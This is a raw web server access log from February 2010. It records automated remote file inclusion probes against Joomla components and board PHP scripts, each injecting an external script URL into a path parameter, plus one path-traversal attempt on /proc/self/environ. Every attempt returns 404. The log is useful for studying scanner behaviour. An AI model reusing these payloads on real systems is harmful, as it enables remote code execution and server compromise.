78.110.50.102 - - [21/Feb/2010:05:36:44 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:36:44 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:36:45 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:37:47 -0800] "GET /logs/access_100125.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:37:48 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:37:55 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:37:55 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:37:55 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:38:13 -0800] "GET /logs/access_100125.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:05:38:23 -0800] "GET /logs/access_100115.log/htmltonuke.php?filnavn=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:05:38:28 -0800] "GET /logs/access_100125.log/htmltonuke.php?filnavn=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:39:14 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:39:14 -0800] "GET /logs/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:39:14 -0800] "GET /errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:39:17 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:39:17 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:39:17 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:39:17 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:39:34 -0800] "GET /logs/access_100124.log%20%20//e404.php?DOCUMENT_ROOT=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:39:59 -0800] "GET /errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:39:59 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:40:00 -0800] "GET /logs/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:40:06 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:05:40:21 -0800] "GET /logs/access_100214.log/htmltonuke.php?filnavn=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:40:33 -0800] "GET /logs/access_100206.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:40:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:40:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:40:37 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:40:37 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:40:37 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:40:45 -0800] "GET /logs/access_100201.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:40:54 -0800] "GET /logs/access_100121.log//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:40:54 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.0" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:40:55 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:41:49 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:41:50 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:41:53 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:41:54 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:41:54 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:41:54 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:42:37 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:42:55 -0800] "GET /logs/access_100125.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:42:55 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:43:03 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:43:08 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:43:08 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:43:08 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:43:09 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:43:13 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:43:23 -0800] "GET /logs/access_100122.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:43:23 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:43:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:43:55 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:43:55 -0800] "GET /logs/access_100121.log%20%20//bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:43:55 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [21/Feb/2010:05:44:23 -0800] "GET /logs/access_100128.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:44:25 -0800] "GET /logs/access_100121.log//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:44:26 -0800] "GET /write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:44:26 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:44:35 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:44:35 -0800] "GET /logs/access_100126.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:44:36 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:44:53 -0800] "GET /logs/access_100201.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:45:17 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:45:17 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:45:18 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:45:21 -0800] "GET /logs/access_100129.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:45:27 -0800] "GET /logs/access_100121.log////delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:45:27 -0800] "GET /logs/access_100123.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:45:27 -0800] "GET ///delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:05:45:27 -0800] "GET /logs////delete_comment.php?board_skin_path=http://www.ville-surylecomtal.fr/new/administrator/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:45:58 -0800] "GET /modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:45:58 -0800] "GET /logs/access_100206.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:45:58 -0800] "GET /logs//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:46:31 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:46:35 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:46:35 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:46:35 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:46:36 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:46:36 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:46:41 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:46:41 -0800] "GET /logs/access_100126.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:47:24 -0800] "GET /logs//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:47:24 -0800] "GET /logs/access_100206.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:47:24 -0800] "GET /modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:05:47:34 -0800] "GET /logs/access_100207.log/http://www.import-et-export.fr//components/com_virtuemart/rs.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:05:47:35 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:05:47:37 -0800] "GET /http://www.import-et-export.fr//components/com_virtuemart/rs.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:05:47:38 -0800] "GET /logs/http://www.import-et-export.fr//components/com_virtuemart/rs.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:05:47:58 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:05:47:58 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:05:47:58 -0800] "GET /logs/access.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:05:47:58 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:05:47:58 -0800] "GET /logs/access.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:05:47:58 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:05:48:00 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:05:48:00 -0800] "GET /logs/access.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:05:48:00 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:05:48:11 -0800] "GET /logs/access.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:05:48:11 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:05:48:11 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:05:48:18 -0800] "GET /logs/access_100205.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:05:48:22 -0800] "GET /logs/access_100205.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:05:48:27 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:05:48:27 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:05:48:29 -0800] "GET /logs/access.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:05:48:29 -0800] "GET /param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:05:48:29 -0800] "GET /logs//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [21/Feb/2010:05:48:31 -0800] "GET /logs/access_100205.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [21/Feb/2010:05:48:31 -0800] "GET /logs/access.log%20%20//param.peoplebook.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.133.29.194 - - [21/Feb/2010:05:48:38 -0800] "GET /error.php?dir=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [21/Feb/2010:05:48:38 -0800] "GET /logs/access_100116.log/error.php?dir=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
174.133.29.194 - - [21/Feb/2010:05:48:38 -0800] "GET /logs/access_100116.log/error.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
